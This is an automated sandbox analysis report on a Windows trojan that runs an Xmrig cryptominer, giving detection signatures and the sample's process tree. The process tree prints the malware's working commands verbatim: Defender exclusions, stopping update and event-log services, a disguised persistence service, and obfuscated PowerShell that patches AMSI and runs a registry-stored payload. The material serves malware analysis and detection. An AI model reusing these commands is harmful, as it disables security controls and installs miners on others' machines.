Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
egFMhHSlmf.exe

Overview

General Information

Sample name:egFMhHSlmf.exe
renamed because original name is a hash value
Original sample name:1417d38c40d85d1c4eb7fad3444ca069.exe
Analysis ID:1530444
MD5:1417d38c40d85d1c4eb7fad3444ca069
SHA1:27d8e2ca9537c80d1c1148830f9a6499f1e3e797
SHA256:5f7c6cdea3c4e825af1d796cbd34b2d45b2b6fabed130e717a30a6d871993f5d
Tags:64exetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • egFMhHSlmf.exe (PID: 1764 cmdline: "C:\Users\user\Desktop\egFMhHSlmf.exe" MD5: 1417D38C40D85D1C4EB7FAD3444CA069)
    • powershell.exe (PID: 7056 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5128 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 948 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 4568 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4876 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5692 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2144 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7008 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2676 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6104 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7080 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2032 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 3084 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • sc.exe (PID: 5360 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3540 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5704 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4856 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3768 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMwf=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+'cA'+'d'+'d'+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PKjZFAJMrKtEHtCAQET=OkULRfyuHQtJ @([String])([IntPtr]);$TwfHJfbEiJESflVXJDRdie=OkULRfyuHQtJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VJhcAYUztep=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'od'+[Char](117)+''+[Char](108)+''+'e'+'H'+[Char](97)+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+'2'+'.'+[Char](100)+'l'+[Char](108)+'')));$pGTzdTbPDPtdSw=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$VJhcAYUztep,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$gmmiBVEmviKAGYOfq=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$VJhcAYUztep,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$RgMdvyV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pGTzdTbPDPtdSw,$PKjZFAJMrKtEHtCAQET).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$RRZbMqrVsxPNJwFWd=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$RgMdvyV,[Object]('Am'+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$InrlgaQyOp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmmiBVEmviKAGYOfq,$TwfHJfbEiJESflVXJDRdie).Invoke($RRZbMqrVsxPNJwFWd,[uint32]8,4,[ref]$InrlgaQyOp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RRZbMqrVsxPNJwFWd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmmiBVEmviKAGYOfq,$TwfHJfbEiJESflVXJDRdie).Invoke($RRZbMqrVsxPNJwFWd,[uint32]8,0x20,[ref]$InrlgaQyOp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+'l'+'er'+'s'+'ta'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 3820 cmdline: C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • dllhost.exe (PID: 7080 cmdline: C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • updater.exe (PID: 5712 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: 1417D38C40D85D1C4EB7FAD3444CA069)
    • powershell.exe (PID: 7068 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3268 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1944 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 2676 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4364 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6904 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5704 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4980 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1948 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6600 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3816 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5372 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 5952 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 6900 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 2248 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • powershell.exe (PID: 2120 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tvJmJWkkljdL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rUCvlIraVSkSNU,[Parameter(Position=1)][Type]$lDxjOqsFCa)$hzEPfdAIUJU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Mem'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hzEPfdAIUJU.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rUCvlIraVSkSNU).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'aged');$hzEPfdAIUJU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t,V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$lDxjOqsFCa,$rUCvlIraVSkSNU).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hzEPfdAIUJU.CreateType();}$opuJgspdjbNOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$JRxrSkXtFvoHQj=$opuJgspdjbNOB.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BKEqIqCwRefEvWHkEvb=tvJmJWkkljdL @([String])([IntPtr]);$jHKuyMaewNXWYnPAXNtVwb=tvJmJWkkljdL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TPsVJhpipYG=$opuJgspdjbNOB.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+'o'+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'ne'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$rnQeYQPaljIZIy=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$TPsVJhpipYG,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+'Li'+[Char](98)+'r'+'a'+''+'r'+''+'y'+''+[Char](65)+'')));$baDhPfYjDHPSnZPKw=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$TPsVJhpipYG,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+'ua'+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$dImCJWh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rnQeYQPaljIZIy,$BKEqIqCwRefEvWHkEvb).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$VaoZSrEKYRrKpAGDt=$JRxrSkXtFvoHQj.Invoke($Null,@([Object]$dImCJWh,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$HGMKYUxWWR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($baDhPfYjDHPSnZPKw,$jHKuyMaewNXWYnPAXNtVwb).Invoke($VaoZSrEKYRrKpAGDt,[uint32]8,4,[ref]$HGMKYUxWWR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VaoZSrEKYRrKpAGDt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($baDhPfYjDHPSnZPKw,$jHKuyMaewNXWYnPAXNtVwb).Invoke($VaoZSrEKYRrKpAGDt,[uint32]8,0x20,[ref]$HGMKYUxWWR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'TW'+[Char](65)+'R'+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000042.00000002.3447887034.0000028A981B7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
